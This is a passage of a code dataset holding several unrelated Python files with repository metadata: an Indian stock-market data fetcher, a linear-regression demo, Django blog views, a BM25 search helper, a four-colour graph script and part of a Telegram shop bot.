self.__nse_urls.INDEX_DATA_CLM\n elif symbol == \"INDIA VIX\":\n fined_dfs = dfs.iloc[1:]\n fined_dfs.drop(fined_dfs.index[0],inplace=True)\n fined_dfs.columns = self.__nse_urls.VIX_DATA_CLM\n fined_dfs.drop(fined_dfs.index[-1],inplace=True)\n fined_dfs.set_index(\"Date\",inplace=True)\n return fined_dfs\n\n def __get_datarange_intv(self,start,end,intv):\n diff = math.ceil((end - start).days / intv)\n date_ranges = []\n curr_start = prev_start = start\n for i in range(diff):\n curr_start = (start + timedelta(intv * i))\n if i !=0:\n start_ = prev_start\n end_ = curr_start - timedelta(1)\n date_ranges.append((start_,end_))\n prev_start = curr_start\n date_ranges.append((curr_start,end))\n return date_ranges\n\n def __get_data_adjusted(self,dfs,symbol,series=\"EQ\",start=None,end=None,periods=None):\n if periods and (dfs.shape[0] < periods):\n new_periods = periods - dfs.shape[0]\n try:\n s_from = e_till = None\n #if only start, find till today\n if start and (not end):\n s_from = dfs.index[0] + timedelta(1)\n e_till = None\n #if not start, can go to past\n elif((end and (not start)) or periods):\n s_from = None\n e_till = dfs.index[-1] - timedelta(1)\n except IndexError as err:\n raise Exception(\"NSE Access error.\")\n except Exception as exc:\n raise Exception(\"Stock data error: \",str(exc))\n try:\n dfs_new = self.get_data(symbol,series,start = s_from,end = e_till,periods = new_periods)\n dfs = 
self.__join_dfs(dfs,dfs_new).sort_index(ascending=False)\n except Exception as exc:\n #data may not be available\n pass\n return dfs\n\n def __format_df(self,dfs):\n if not dfs.empty:\n dfs.columns = dfs.columns.str.title()\n\n def get_data(self,symbol,series=\"EQ\",start=None,end=None,periods=None,dayfirst=False):\n \"\"\"To get NSE stock data\n\n :param symbol: stock/index symbol\n :type symbol: string\n :param series: segment, defaults to \"EQ\"\n :type series: string, optional\n :param start: start date, defaults to None\n :type start: string, optional\n :param end: end date, defaults to None\n :type end: string, optional\n :param periods: number of days, defaults to None\n :type periods: integer, optional\n :param dayfirst: True if date format is European style DD/MM/YYYY, defaults to False\n :type dayfirst: bool, optional\n :raises Exception: NSE Connection Related\n :return: stock data\n :rtype: pandas.DataFrame\n \"\"\"\n try:\n\n #Step1: get the date range\n s_from,e_till = get_date_range(start=start,end=end,periods=periods,dayfirst=dayfirst)\n\n if s_from > e_till:\n raise ValueError(\"End should be greater than start.\")\n\n data_limit = None\n if self.__nse_urls.is_index(symbol):\n data_limit = INDEX_DATA_LIMIT\n else:\n data_limit = STOCK_DATA_LIMIT\n\n data_days = e_till - s_from\n\n hack = self.__request.get(self.__nse_urls.BASE_URL,headers=self.__headers)\n if (data_days.days) > data_limit:\n date_ranges = self.__get_datarange_intv(s_from,e_till,data_limit)\n workers = len(date_ranges)\n with concurrent.futures.ThreadPoolExecutor(max_workers=workers) as executor:\n responses = [executor.submit(self.get_data, symbol=symbol,start=start_,end=end_,dayfirst=dayfirst)\\\n for start_,end_ in date_ranges]\n dfs = []\n for res in concurrent.futures.as_completed(responses):\n try:\n df = res.result()\n dfs.append(df)\n except Exception as exc:\n #might be holiday/no record\n pass\n all_dfs = pd.concat(dfs).sort_index(ascending=False)\n adjusted_dfs = self.__get_data_adjusted(all_dfs,symbol,start=start,end=end,periods=periods)\n return adjusted_dfs\n\n data_url = self.__nse_urls.get_stock_data_url\\\n (\n symbol,series=series,start=s_from,\n end=e_till\n )\n\n csv = self.__request.get(data_url,headers=self.__headers)\n\n #if it is an index, we need to read the table\n # Why the heck are we doing so much handling? Is there any other way?\n # Suggestions are welcome. 
ping me on github\n if self.__nse_urls.is_index(symbol):\n dfs = self.__parse_indexdata(csv.text,symbol)\n else:\n dfs = pd.read_csv(io.StringIO(csv.content.decode('utf-8')))\n dfs.set_index('Date ',inplace=True)\n # Converting the index as date\n dfs.index = pd.to_datetime(dfs.index)\n dfs = self.__get_data_adjusted(dfs,symbol,start=start,end=end,periods=periods)\n #format dataframe\n self.__format_df(dfs)\n return dfs\n\n except Exception as err:\n raise Exception(\"Error occurred while fetching stock data :\", str(err))", "repo_name": "stockalgo/bandl", "sub_path": "lib/bandl/nse_data.py", "file_name": "nse_data.py", "file_ext": "py", "file_size_in_byte": 22315, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 53, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.set_option", "line_number": 25, "usage_type": "call"}, {"api_name": "bandl.nse_urls.NseUrls", "line_number": 29, "usage_type": "call"}, {"api_name": "bandl.request.RequestUrl", "line_number": 32, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 46, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 58, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 86, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 121, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 145, "usage_type": "call"}, {"api_name": "pandas.read_html", "line_number": 191, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 210, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 212, "usage_type": "call"}, {"api_name": "os.path", "line_number": 212, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 217, "usage_type": "call"}, {"api_name": "os.path", "line_number": 217, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 220, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 220, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 225, "usage_type": "call"}, {"api_name": "os.path", "line_number": 225, "usage_type": "attribute"}, {"api_name": "bandl.helper.get_formated_date", "line_number": 300, "usage_type": "call"}, {"api_name": "bandl.helper.get_formated_date", "line_number": 302, "usage_type": "call"}, {"api_name": "bandl.helper.get_formated_date", "line_number": 306, "usage_type": "call"}, {"api_name": "pandas.date_range", "line_number": 310, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 315, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 316, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 317, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 318, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 319, "usage_type": "call"}, {"api_name": "os.cpu_count", "line_number": 323, "usage_type": "call"}, {"api_name": "concurrent.futures.futures.ThreadPoolExecutor", "line_number": 325, "usage_type": "call"}, {"api_name": "concurrent.futures.futures", "line_number": 325, "usage_type": "attribute"}, {"api_name": "concurrent.futures", "line_number": 325, "usage_type": "name"}, {"api_name": "concurrent.futures.futures.as_completed", "line_number": 327, "usage_type": "call"}, {"api_name": "concurrent.futures.futures", "line_number": 327, "usage_type": "attribute"}, {"api_name": "concurrent.futures", "line_number": 327, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 335, "usage_type": "call"}, 
{"api_name": "io.StringIO", "line_number": 335, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 360, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 365, "usage_type": "call"}, {"api_name": "pandas.read_html", "line_number": 383, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 398, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 402, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 405, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 418, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 423, "usage_type": "call"}, {"api_name": "bandl.helper.get_date_range", "line_number": 462, "usage_type": "call"}, {"api_name": "concurrent.futures.futures.ThreadPoolExecutor", "line_number": 479, "usage_type": "call"}, {"api_name": "concurrent.futures.futures", "line_number": 479, "usage_type": "attribute"}, {"api_name": "concurrent.futures", "line_number": 479, "usage_type": "name"}, {"api_name": "concurrent.futures.futures.as_completed", "line_number": 483, "usage_type": "call"}, {"api_name": "concurrent.futures.futures", "line_number": 483, "usage_type": "attribute"}, {"api_name": "concurrent.futures", "line_number": 483, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 490, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 508, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 508, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 511, "usage_type": "call"}]} +{"seq_id": "7323499478", "text": "#cài đặt thư viện cần thiết\r\nimport numpy as np\r\n#thư viện để vẽ biểu đồ\r\nimport matplotlib.pyplot as plt\r\n\r\n#phát sinh dữ liệu\r\n#Tạo dữ liệu X có giá trị từ -5 đến 5 \r\n#với bước nhảy bằng 0.5\r\nx = np.arange(-5,5,0.5)\r\n#Giá trị n_sample là số lượng phần tử (dữ liệu) của mảng X\r\nn_sample = len(x)\r\n#Giá trị noise - nhiễu thống kê \r\n#liên quan đến sự biến thiên trong mẫu\r\n#Nhiễu được biển diễn dưới dạng biến ngẫu nhiên\r\nnoise = np.random.normal(0,1,n_sample)\r\n#Khởi tạo giá trị Y\r\nY = 5*x - 6 +noise\r\n#biểu diễn x và Y trên đồ thị dưới dạng chấm tròn màu đỏ\r\nplt.plot(x,Y, 'ro')\r\n\r\n\r\n# Tạo một mảng gồm những giá trị 1\r\n# mảng có độ dài bằng độ dài của mảng x\r\nones = np.ones((1,n_sample))\r\n# Mảng X là mảng được gộp bởi mảng những giá trị 1 \r\n# và mảng x đã được khởi tạo ở trên\r\nX = np.concatenate((ones, [x]))\r\n#In mảng X\r\nprint(X)\r\n#In mảng Y\r\nprint(Y)\r\n#khởi tạo giá trị theta, alpha,eps\r\ntheta = np.array([[10],[-5]])\r\nalpha = 0.01\r\neps = 0.0001\r\n\r\n\r\n#Lặp\r\n#Cập nhật tham số\r\n#Kiểm tra điểm dừng của vòng lặp\r\nwhile True:\r\n #Tích của X và theta chuyển vị trừ cho Y \r\n #Lấy chuyển vị của hiệu số nhân với X \r\n #Tất cả chia n_sample\r\n #Đạo hàm theo vector theta\r\n nabla = (1.0/n_sample)*np.dot(X, (np.dot(theta.T, X) - Y).T)\r\n #Cập nhật theta để thay đổi nabla ở bước sau \r\n theta = theta - alpha*nabla\r\n \r\n #Trực quan hóa kết quả, vẽ phương trình đường thẳng \r\n #y = theta1*x + theta0\r\n \r\n #trực quan hóa dữ liệu\r\n x_vis = np.array([-5.0,5.0])\r\n y_vis = theta[1][0]*x_vis + theta[0][0]\r\n plt.plot(x_vis,y_vis)\r\n plt.pause(0.1)\r\n \r\n #Tính lại nabla\r\n nabla = (1.0/n_sample)*np.dot(X, (np.dot(theta.T, X) - Y).T)\r\n if abs(nabla[0][0]) < eps and abs(nabla[1][0]) < eps:\r\n break\r\n \r\n#In kết quả \r\nprint('Gia tri toi uu cua theta = ', theta)\r\nplt.show()\r\n\r\n", "repo_name": 
"dhlinhdan/CS331.M21-", "sub_path": "np_linear_regression_.py", "file_name": "np_linear_regression_.py", "file_ext": "py", "file_size_in_byte": 2150, "program_lang": "python", "lang": "vi", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.arange", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 15, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.pause", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "numpy.dot", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}]} +{"seq_id": "26587417995", "text": "from django.contrib.auth import get_user_model\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import get_object_or_404, render, redirect\nfrom django.views.decorators.cache import cache_page\n\nfrom .forms import PostForm, CommentForm\nfrom .models import Group, Post, Comment, Follow\nfrom .utils import paginator\n\nUser = get_user_model()\n\n\n@cache_page(20, key_prefix='index_page')\ndef index(request):\n \"\"\"\n Вью функция отвечающая за вывод постов на главной странице,\n пагинируется, сортируется от новых к старым, 10 постов на страницу.\n \"\"\"\n post_list = Post.objects.select_related()\n page_number = request.GET.get('page')\n page_obj = paginator(post_list).get_page(page_number)\n\n context = {\n 'page_obj': page_obj,\n }\n return render(request, 'posts/index.html', context)\n\n\ndef group_posts(request, slug):\n \"\"\"\n Вью функция отвечающая за вывод постов на странице группы,\n пагинируется, сортируется от новых к старым и по принадлежности\n к группе, 10 постов на страницу.\n \"\"\"\n group = get_object_or_404(Group, slug=slug)\n posts = group.group_posts.select_related()\n page_number = request.GET.get('page')\n page_obj = paginator(posts).get_page(page_number)\n context = {\n 'page_obj': page_obj,\n 'group': group,\n }\n return render(request, 'posts/group_list.html', context)\n\n\ndef profile(request, username):\n \"\"\"\n Вью функция отвечающая за вывод постов на странице пользователя,\n пагинируется, сортируется от новых к старым и по принадлежности\n к пользователю, 10 постов на страницу.\n Переменная following отвечает за значение кнопки подписки/отписки\n от автора.\n \"\"\"\n author = get_object_or_404(User, username=username)\n following = request.user.is_authenticated and author.following.exists()\n\n posts = author.posts.all()\n page_number = request.GET.get('page')\n page_obj = paginator(posts).get_page(page_number)\n context = {\n 'author': author,\n 'page_obj': page_obj,\n 
def post_detail(request, post_id):\n    \"\"\"\n    View function that renders a single post\n    on the detail page, looked up by id\n    \"\"\"\n    post = get_object_or_404(Post, id=post_id)\n    comment = Comment.objects.filter(post_id=post_id)\n    form = CommentForm(request.POST or None)\n    context = {\n        'post': post,\n        'comments': comment,\n        'form': form\n    }\n    return render(request, 'posts/post_detail.html', context)\n\n\n@login_required()\ndef post_create(request):\n    \"\"\"\n    View function for creating a new post.\n    \"\"\"\n\n    form = PostForm(\n        request.POST or None,\n        files=request.FILES or None,\n    )\n    if form.is_valid():\n        post = form.save(commit=False)\n        post.author = request.user\n        form.save()\n        return redirect('posts:profile', post.author)\n    return render(request, 'posts/create_post.html', {'form': form})\n\n\n@login_required()\ndef post_edit(request, post_id):\n    \"\"\"\n    View function for editing a post.\n    \"\"\"\n    post = get_object_or_404(Post, id=post_id)\n\n    if post.author != request.user:\n        return redirect('posts:post_detail', post_id)\n\n    form = PostForm(\n        request.POST or None,\n        instance=post,\n        files=request.FILES or None,\n    )\n    if form.is_valid():\n        form.save()\n        return redirect('posts:post_detail', post_id)\n    return render(request, 'posts/create_post.html', {'form': form,\n                                                      'is_edit': True})\n\n\n@login_required\ndef add_comment(request, post_id):\n    post = get_object_or_404(Post, id=post_id)\n    form = CommentForm(request.POST or None)\n    if form.is_valid():\n        comment = form.save(commit=False)\n        comment.author = request.user\n        comment.post = post\n        comment.save()\n    return redirect('posts:post_detail', post_id=post_id)\n\n\n@login_required\ndef follow_index(request):\n    post_list = Post.objects.filter(author__following__user=request.user)\n    page_number = request.GET.get('page')\n    page_obj = paginator(post_list).get_page(page_number)\n\n    context = {\n        'page_obj': page_obj,\n    }\n    return render(request, 'posts/follow.html', context)\n\n\n@login_required\ndef profile_follow(request, username):\n    author = get_object_or_404(User, username=username)\n    user = request.user\n    if author != user:\n        Follow.objects.get_or_create(user=user, author=author)\n    return redirect('posts:follow_index')\n\n\n@login_required\ndef profile_unfollow(request, username):\n    author = get_object_or_404(User, username=username)\n    obj = Follow.objects.filter(user=request.user, author=author)\n    obj.delete()\n\n    return redirect('posts:follow_index')\n", "repo_name": "gutolin/hw05_final", "sub_path": "yatube/posts/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 5370, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.contrib.auth.get_user_model", "line_number": 10, "usage_type": "call"}, {"api_name": "models.Post.objects.select_related", "line_number": 19, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 19, "usage_type": "name"}, {"api_name": "utils.paginator", "line_number": 21, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 26, "usage_type": "call"}, {"api_name": "django.views.decorators.cache.cache_page", "line_number": 13, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 35, "usage_type": "call"}, {"api_name": "models.Group", "line_number": 35, 
"usage_type": "argument"}, {"api_name": "utils.paginator", "line_number": 38, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 43, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 54, "usage_type": "call"}, {"api_name": "utils.paginator", "line_number": 59, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 65, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 73, "usage_type": "call"}, {"api_name": "models.Post", "line_number": 73, "usage_type": "argument"}, {"api_name": "models.Comment.objects.filter", "line_number": 74, "usage_type": "call"}, {"api_name": "models.Comment.objects", "line_number": 74, "usage_type": "attribute"}, {"api_name": "models.Comment", "line_number": 74, "usage_type": "name"}, {"api_name": "forms.CommentForm", "line_number": 75, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 81, "usage_type": "call"}, {"api_name": "forms.PostForm", "line_number": 90, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 98, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 99, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 84, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 107, "usage_type": "call"}, {"api_name": "models.Post", "line_number": 107, "usage_type": "argument"}, {"api_name": "django.shortcuts.redirect", "line_number": 110, "usage_type": "call"}, {"api_name": "forms.PostForm", "line_number": 112, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 119, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 120, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 102, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 126, "usage_type": "call"}, {"api_name": "models.Post", "line_number": 126, "usage_type": "argument"}, {"api_name": "forms.CommentForm", "line_number": 127, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 133, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 124, "usage_type": "name"}, {"api_name": "models.Post.objects.filter", "line_number": 138, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 138, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 138, "usage_type": "name"}, {"api_name": "utils.paginator", "line_number": 140, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 145, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 136, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 150, "usage_type": "call"}, {"api_name": "models.Follow.objects.get_or_create", "line_number": 153, "usage_type": "call"}, {"api_name": "models.Follow.objects", "line_number": 153, "usage_type": "attribute"}, {"api_name": "models.Follow", "line_number": 153, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 154, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 148, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 159, "usage_type": "call"}, {"api_name": 
"models.Follow.objects.filter", "line_number": 160, "usage_type": "call"}, {"api_name": "models.Follow.objects", "line_number": 160, "usage_type": "attribute"}, {"api_name": "models.Follow", "line_number": 160, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 163, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 157, "usage_type": "name"}]} +{"seq_id": "7316048174", "text": "import networkx as nx\n\n\nVERTS = 27\t# max number of vertices in a free completion + 1\nDEG = 13\t# max degree of a vertex in a free completion + 1\nEDGES = 62\t# max number of edges in a free completion + 1 \nMAXRING = 14 # max ring size\n\n\ndef main():\n \n # what is this? it is something to do with signed matches\n simatchnumber = [0, 0, 1, 3, 10, 30, 95, 301, 980, 3228, 10797, 36487, 124542, 428506, 1485003]\n\n power = [3**i for i in range(-1,16)]\n ncodes = (power[MAXRING] + 1) / 2\t# max number of codes. What are codes?\n nchar = simatchnumber[MAXRING] / 8 + 2;\n \n with open(\"unavoidable.conf\") as fp:\n lines = [l.strip() for l in fp.readlines()]\n graphs = []\n while lines:\n graph, lines = readSingleConf(lines)\n graphs.append(graph)\n print(\"read {} graphs from config\".format(len(graphs)))\n \n for graph in graphs:\n number_edges(graph)\n \n example = graphs[0].free_completion[1][2]\n print(\"numbered the graphs, the first looks like this {}\".format(example))\n \n \n\nclass ConfigGraph:\n def __init__(self, name, num_vertices, ring_size, cardinality_C, cardinality_Cprime, X, free_completion, coordinates):\n self.name = name\n self.num_vertices = num_vertices\n self.ring_size = ring_size\n self.cardinality_C = cardinality_C\n self.cardinality_Cprime = cardinality_Cprime\n self.X = X\n self.free_completion = free_completion\n self.coordinates = coordinates\n\n def __str__(self):\n return str([self.name, self.num_vertices, self.ring_size, self.X, list(self.free_completion.edges), self.coordinates])\n\n\ndef number_edges(graph: ConfigGraph):\n \"\"\" Numbers edges from 1 up, so that each edge has as many later edges in\n * triangles as possible; the ring edges are first. 
\"\"\"\n \n h = nx.Graph()\n h.add_edges_from(graph.free_completion.edges)\n \n edge_number = 1\n while h.edges():\n max_edge = max(h.edges(), key = lambda edge: len(set(h[edge[0]]).intersection(h[edge[1]])))\n graph.free_completion[max_edge[0]][max_edge[1]][\"edge_number\"] = edge_number\n h.remove_edge(max_edge[0], max_edge[1])\n edge_number += 1\n\n\ndef readSingleConf(lines):\n name = lines[0]\n num_vertices, ring_size, cardinality_C, cardinality_Cprime = map(int, lines[1].split())\n x_data = lines[2].split()[1:]\n X = [map(int, x_data[i:i+2]) for i in range(0, len(x_data), 2)]\n \n G = nx.Graph()\n adjacency_lines = lines[3:3 + num_vertices]\n split_lines = [line.split() for line in adjacency_lines]\n edges = [(int(line[0]),int(y)) for line in split_lines for y in line[2:]]\n G.add_edges_from(edges)\n \n i = 0\n coordinates = []\n while 3 + num_vertices + i < len(lines) and lines[3 + num_vertices + i]:\n line = lines[3 + num_vertices + i]\n coordinates.extend([int(l) for l in line.split()])\n i += 1\n \n return ConfigGraph(\n name, \n num_vertices, \n ring_size, \n cardinality_C, \n cardinality_Cprime,\n X, \n G,\n coordinates), lines[4 + num_vertices + i:]\n\nif __name__ == \"__main__\":\n main()", "repo_name": "kevinpetersavage/fourcolour", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3211, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "networkx.Graph", "line_number": 54, "usage_type": "call"}, {"api_name": "networkx.Graph", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "70013413926", "text": "import re\nfrom common.log import logger\nimport requests\nfrom thefuzz import fuzz\nfrom thefuzz import process\nimport jieba\nfrom rank_bm25 import BM25Okapi\n\ndef is_chinese(string):\n \"\"\"\n 判断字符串是否为中文\n \"\"\"\n pattern = re.compile(r'[\\u4e00-\\u9fa5]')\n match = pattern.search(string)\n return match is not None\n\n\ndef relevance_by_bm25(query, docs):\n query_token = list(jieba.cut_for_search(query))\n doc_token = [list(jieba.cut_for_search(d)) for d in docs]\n bm25 = BM25Okapi(doc_token)\n return bm25.get_scores(query_token)\n\ndef get_google_search_content(query):\n try:\n url = 'http://127.0.0.1:8084/openai/session/google_search'\n headers = {'Content-Type': 'application/json'}\n data = {'query': query}\n response = requests.post(url, headers=headers, json=data)\n data = response.json()['data'][:3]\n titles_dict = {d['title']: d for d in data if len(d.get('content', \"\")) > 100}\n titles = list(titles_dict.keys())\n title_contents = [t + '\\n\\r' + titles_dict[t]['content'] for t in titles]\n\n #titles_scores_1 = [fuzz.partial_ratio(query, t) for t in titles]\n #titles_scores_2 = [fuzz.partial_ratio(query, t) for t in title_contents]\n #titles_scores = [titles_scores_1[i] + titles_scores_2[i] for i in range(0, len(titles_scores_1))]\n titles_scores = relevance_by_bm25(query, title_contents)\n\n logger.debug(\"google search titles={} scores={}\".format(titles, titles_scores))\n max_score = max(titles_scores)\n best_title = titles[ [i for i in range(0, len(titles_scores)) if titles_scores[i] == max_score][0] ]\n logger.debug(\"google search best_title={} content={}\".format(best_title, titles_dict[best_title]))\n #logger.info(\"google search res json:{}\".format(response.json()))\n return titles_dict[best_title]\n except Exception as e:\n logger.exception(e)\n return None\n\nif __name__ == '__main__':\n print(is_chinese(\"ssdfdf\"))\n 
print(is_chinese(\"水电费\"))", "repo_name": "atp798/chatbot", "sub_path": "py_flask/common/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 2040, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "re.compile", "line_number": 13, "usage_type": "call"}, {"api_name": "jieba.cut_for_search", "line_number": 19, "usage_type": "call"}, {"api_name": "jieba.cut_for_search", "line_number": 20, "usage_type": "call"}, {"api_name": "rank_bm25.BM25Okapi", "line_number": 21, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 29, "usage_type": "call"}, {"api_name": "common.log.logger.debug", "line_number": 40, "usage_type": "call"}, {"api_name": "common.log.logger", "line_number": 40, "usage_type": "name"}, {"api_name": "common.log.logger.debug", "line_number": 43, "usage_type": "call"}, {"api_name": "common.log.logger", "line_number": 43, "usage_type": "name"}, {"api_name": "common.log.logger.exception", "line_number": 47, "usage_type": "call"}, {"api_name": "common.log.logger", "line_number": 47, "usage_type": "name"}]} +{"seq_id": "30485397289", "text": "from run import dp, bot, types, State, UpdateUserState, ClientStateGroup, ProductEditState, AddressStateGroup\nfrom keyboards import start_keyboards, language_keyboards, category_keyboards, products_keyboard, add_cart_keyboards, get_location_keyboards, basket_keyboard\nfrom db.manager import is_authenticated, get_user_language, add_to_cart, get_cart_products, update_cart, get_cart_product, drop_all_cart, set_language\nfrom fetch import is_confirmed, get_categories, get_category_products, get_category, get_product_from_list, baseUrl, get_color, get_product, user_me, get_address, create_order, create_address, update_user\nfrom aiogram.dispatcher.filters import Text\nfrom aiogram.dispatcher.storage import FSMContext\nfrom utils import send_message_local, translate_text\nimport json\nimport math\nimport time\nfrom decimal import Decimal\nimport re\n\n# Commands /start and /basket\n\n@dp.message_handler(commands=['start'])\nasync def send_welcome(message: types.Message, state=None): \n language = get_user_language(message.from_user.id)\n me = user_me(telegram_id=message.from_user.id)\n\n\n if is_authenticated(message.from_user.id) == True and me.get(\"detail\") is None:\n return await send_message_local(message.from_user.id, text=f\"Assalomu aleykum {message.from_user.first_name} 😊\\n\\nNima buyurtma qilamiz ?\", lang=language, reply_markup=start_keyboards(lang=language))\n \n # elif is_authenticated(message.from_user.id) and me.get(\"detail\") is None:\n # await bot.delete_message(chat_id=message.from_user.id, message_id=message.message_id)\n\n # return await send_message_local(message.from_user.id, \"Siz telefon raqamingizni tasdiqlamadingiz! Tasdiqlash uchun /verification komandasini ni yuboring\", lang=language)\n\n await ClientStateGroup.language.set()\n\n await bot.send_message(chat_id=message.from_user.id, text=f\"\"\"\n Assalomu Alaykum! Bizning botdan foydalanish uchun ro'yxatdan o'ting\\n\\nЗдравствуйте! 
Чтобы пользоваться нашим ботом вам необходимо пройти регистрацию.\n    \"\"\")\n\n    await bot.send_message(chat_id=message.from_user.id, text=f\"\"\"\n    Tilingizni tanlang\\n\\nВыберите ваш язык\n    \"\"\", reply_markup=language_keyboards)\n\n\n\n\n@dp.message_handler(commands=['basket'])\nasync def basket(message: types.Message):\n    products = get_cart_products(message.from_user.id)\n    text = \"\"\n    overall_price = 0\n\n    for index, product in enumerate(products):\n        square = product[1]\n        product = json.loads(product[0])\n        lang = get_user_language(message.from_user.id)\n\n\n\n        name = product.get(\"name\")\n        product_id = product.get(\"id\")\n        price = product.get(\"price_sum\")\n        slug = product.get(\"slug\")\n        blackout = product.get(\"blackout\")\n        square_ = re.findall(r\"[-+]?(?:\\d*\\.*\\d+)\", square)\n        w = float(square_[0])\n        h = float(square_[1])\n        \n\n        all_square = w * h\n        all_price = float(price) * all_square\n        overall_price = overall_price + all_price\n        \n        \n        url = f\"{baseUrl}/product/{slug}\"\n        \n\n        text += f\"{index + 1}. {name} - {blackout} ️𝖚𝖗𝖑 \\nОбш кв: {square}\\n\\n\"\n\n    overall_price = str(int(overall_price))\n\n    showPrice = f\"{overall_price[slice(-9, -6)]} {overall_price[slice(-6, -3)]} {overall_price[-3:]}\"\n    \n    text += f\"Общ.цена: {showPrice} сум\"\n\n\n    await bot.send_message(message.from_user.id, text, reply_markup=basket_keyboard(len(products)))\n\n\n\n@dp.message_handler(commands=['address'])\nasync def address(message: types.Message, state=None):\n    # fetch the language first so the unauthenticated branch below can use it too\n    language = get_user_language(message.from_user.id)\n    if is_authenticated(message.from_user.id):\n        address = get_address(message.from_user.id)\n\n        if address == False:\n            await AddressStateGroup.city.set()\n            await send_message_local(message.from_user.id, \"Shaharni kiriting:\", language)\n        else:\n            await send_message_local(message.from_user.id, \"Siz allaqachon address kiritgansiz.\", language)\n    else:\n        await send_message_local(message.from_user.id, \"Siz Ro'yhatdan 